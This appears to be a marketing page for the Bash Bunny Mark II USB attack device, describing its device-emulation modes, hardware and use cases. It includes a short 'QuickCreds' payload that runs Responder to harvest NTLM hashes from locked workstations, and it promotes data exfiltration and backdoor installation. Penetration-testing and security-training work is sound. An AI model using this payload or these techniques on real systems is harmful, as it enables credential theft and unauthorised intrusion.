🐰

Bash Bunny

Mark II β€” USB Attack Platform

The world's most advanced USB attack platform. Simultaneously emulate trusted USB devices to deploy multi-vector payloads β€” from plug to pwn in 7 seconds.

MULTI-VECTOR USB QUAD-CORE ARM DUCKYSCRIPTβ„’ LINUX BLUETOOTH MICROSD
// Overview
From Plug to Pwn in 7 Seconds

Computers inherently trust USB devices β€” keyboards, network adapters, flash drives, serial ports. The Bash Bunny exploits this trust by emulating combinations of these devices simultaneously, tricking targets into divulging data, exfiltrating documents, and installing backdoors. Under the hood it's a full-featured Linux computer with a quad-core CPU and desktop-class SSD. Flick the payload switch, plug it in, and when the LED turns green β€” the machine is compromised.

// Attack Modes
Multi-Vector USB Emulation

The Bash Bunny can emulate any of these trusted USB device types β€” alone or in powerful combinations.

⌨️
HID
Keystroke injection via trusted keyboard emulation
🌐
ETHERNET
2 Gbit adapter with DHCP β€” auto-trusted as primary network
πŸ’Ύ
STORAGE
Mass storage for exfiltration, binary injection & staged payloads
πŸ”Œ
SERIAL
Dedicated serial console for root terminal access
Valid Combinations
HID + STORAGE Inject keystrokes and drop or exfiltrate files simultaneously
HID + ETHERNET Keystroke injection with full network stack for C2 callbacks
ETHERNET + STORAGE Network hijacking combined with mass data exfiltration
ECM + RNDIS Cross-platform Ethernet β€” Linux/Mac (ECM) & Windows (RNDIS)
// Hardware Specs
Specifications
βš™οΈ
Processor
Quad-core ARM CPU
Boots in under 7 seconds
πŸ’Ύ
Storage
Desktop-class SSD (internal)
MicroSD expansion slot
🧠
Memory
512 MB RAM (doubled from Mark I)
πŸ”΅
Bluetooth
Remote triggers & geofencing
Smartphone app control
πŸŽ›οΈ
Controls
3-position payload switch
RGB LED status indicator
🐧
Operating System
Full Debian Linux
Root shell via serial console
πŸ”—
Interface
USB-A male connector
Standard flash drive form factor
πŸ“Ά
Network
2 Gbit emulated Ethernet
ECM + RNDIS cross-platform
// Workflow
Plug β†’ Switch β†’ Pwn
STEP 01
πŸ“
Write Payload
DuckyScript text files β€” use Payload Studio or any editor
STEP 02
πŸ“‚
Load
Copy payload to Bash Bunny in arming mode β€” like a flash drive
STEP 03
πŸ”€
Select
Flick the physical switch to assign payload position
STEP 04
🟒
Deploy
Plug in β€” green LED means mission complete
// Capabilities
Key Features
β–Έ
Multi-Vector Attacks β€” Combine HID, Ethernet, and storage emulation in a single payload. Exploit multiple trust vectors simultaneously.
β–Έ
QuickCreds β€” Instantly harvest credentials by posing as the target's primary network adapter with an authoritative DHCP server.
β–Έ
Wireless Geofencing β€” Prevent payloads from executing outside a designated geographic zone. Destroy loot if the device leaves the area.
β–Έ
Remote Bluetooth Triggers β€” Activate payloads, trigger macros, and initiate exfiltration remotely via smartphone app or any BT device.
β–Έ
Cross-Platform β€” Works on Windows, macOS, Linux, and Android. ECM and RNDIS Ethernet ensures universal compatibility.
β–Έ
Community Payloads β€” Central git repository with a growing library of attacks. Download, customize, and deploy β€” or submit your own.
β–Έ
MicroSD Exfiltration β€” Expandable storage for capturing gigabytes of loot. High-speed data transfer during active engagements.
β–Έ
Payload Studio β€” Full-featured web-based IDE with syntax highlighting, auto-complete, live error checking, and repo sync.
// Payload Example
QuickCreds β€” Credential Harvesting

Emulate a trusted Ethernet adapter, hijack network traffic, and harvest credentials in seconds β€” all while the target PC remains locked.

# QuickCreds β€” Bash Bunny Payload
# Harvests NTLM hashes via network hijack

ATTACKMODE RNDIS_ETHERNET

# Wait for network to be recognized
LED SETUP
REQUIRETOOL responder

# Launch Responder to capture hashes
LED ATTACK
RUN responder -I usb0 -wrFb

# Wait for credentials
WAIT_FOR_LOOT 60

# Cleanup and signal completion
LED FINISH
// Use Cases
Deployment Scenarios
πŸ”“
Credential Harvesting
QuickCreds grabs NTLM hashes from locked workstations in seconds via Responder and network hijacking.
🎯
Physical Red Team
Social engineer your way in, plug the Bunny into an unattended workstation, and exfiltrate documents before anyone notices.
πŸšͺ
Backdoor Installation
Combine HID and storage modes to inject and execute persistence payloads without user interaction.
πŸ“€
Data Exfiltration
Silently copy target files to MicroSD storage while masquerading as a standard USB device.
πŸ€–
IT Automation
Automate repetitive admin tasks β€” software deployment, configuration changes, inventory scripts β€” with a single plug-in.
πŸŽ“
Security Training
Demonstrate USB attack vectors in controlled environments. Show why USB policies and endpoint protection matter.